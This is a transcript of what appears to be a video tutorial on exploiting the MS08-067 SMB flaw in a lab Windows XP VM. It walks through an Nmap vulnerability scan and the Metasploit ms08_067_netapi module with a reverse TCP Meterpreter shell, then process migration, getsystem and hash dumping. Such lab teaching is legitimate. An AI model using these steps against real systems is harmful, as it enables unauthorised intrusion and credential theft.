Windows XP machine. Now, both virtual machines, and you see we're getting responses here, so everything is working. Okay, so in order to exploit a vulnerability, you need to know it's there. Luckily, Nmap has a great script built in that will show us if this vulnerability exists. So we're going to do an Nmap scan against this this Windows box. That's just the IP address of that Windows machine we just saw. And the tag you're going to use is dash dash script equals smb dash check dash vulns. This is going to check for a couple different SMB vulnerabilities. The important one we're looking for is the MS08-067. So we're going to launch that Nmap script. Wait a few minutes. Now, in order for this scan to work, the Windows firewall will have to be off. If it's on, you're not going to get results back. It's not going to be able to check. So there's one good reason to have your Windows firewall on. Oh, okay. So it gave us back basic port information, but part of the script, SMB check vulns, it's telling us MS08067 vulnerable. Now, just to show you, that's not what I wanted to do. Just to show you, this is Service Pack 3. It's not updated all the way. It's just the vanilla Service Pack 3 image installed from an ISO. Okay, so we know it's vulnerable. Now, that makes our job pretty easy. Also, this script, if you want to see if your system's in... If you want to see if your system's infected with configer, this script will actually check that based on the ports that are existing on. So I've already started MSF console by typing MSF console. It takes forever to load up, so it's already done. So we're in the Metasploit framework now. Let's search for MS08067. Now you're going to see Metasploit already has a module for this, and it's one of the probably most used. It works really great. One of the caveats is that you need to know the precise version of Windows that's on the other end. In this case, we already know it's Service Pack 3, so we're going to use that information a little bit later. Wow, things are really dragging here. Damn, sorry guys. So, there we go, geez. So it's an exploit Windows SMB MS08067 net API, right? Okay, so we're going to hit use exploit Windows SMB MS08067 net API. And tab completion works here, so it makes it easier to type that out. So now we can do a show options. And we can see... We need to set our host. Okay, so set our host. 192.168.138.132. This might be different from your system, so you know, just use your IP address here. Set payload. Show payloads. Looks like doing a screen capture and running two virtual machines is about all my Core 2 Duo Mac can take. See, my CPU's at like 100% up here, so that's why things are running a little slow. I think we're going to go with an interpreter shell. So set payload Windows. Reverse TCP. That's a simple one. So. Show options. And as you'll see here, we need to set the listening host here. So, and that's our IP address. 192.168.138. That 130. Okay, so we're saying we're listening, we're targeting that using this exploit. Now, right here, there's automatic targeting. We want to change this. It's a little unreliable. So show targets. See all these targets. It has to try and guess based on OS fingerprinting, and it doesn't always work. So we know that it is Windows XP Service Pack 3 English. I think number 4 will work. And you know what that NX stands for is escaping me right now. Someone post that in the comments if you know. Set target 4. Okay. I will say exploit. And this should work. Seems to be. And here we go. Interpreter shell. The box has been compromised. Let's see, video's at 9 minutes. Okay, we got some time. So, from within the interpreter, we can do PS to list processes, I think. Yeah. Shit, that is hard to see. So I had a text big, so hopefully all you can see in the little YouTube window. However, it's making things a little confusing. So we're going to migrate to the explorer.exe process, which is, I think, 1932 here. So just type migrate 1932. Interpreter is awesome. It migrates us to that process. Kind of improves our chances of keeping this shell open. If it works. Yay. We can dump the hashes for cracking later on. I think we already have system, but we can say get system to get system level privileges if we don't. We can upload and download files from interpreter, but that's for another day. So, hopefully this was informative. All this information, I would recommend the new Metasploit book out. It It's really good. You can get that at No Starch. No Starch Pass. Okay. Let's verify that. My poor little MacBook is getting beat on pretty hard right now. NoStarch.com/Metasploit. Yeah, there we go. I recommend this book. Alright, guys, subscribe, leave comments, let me know what you think.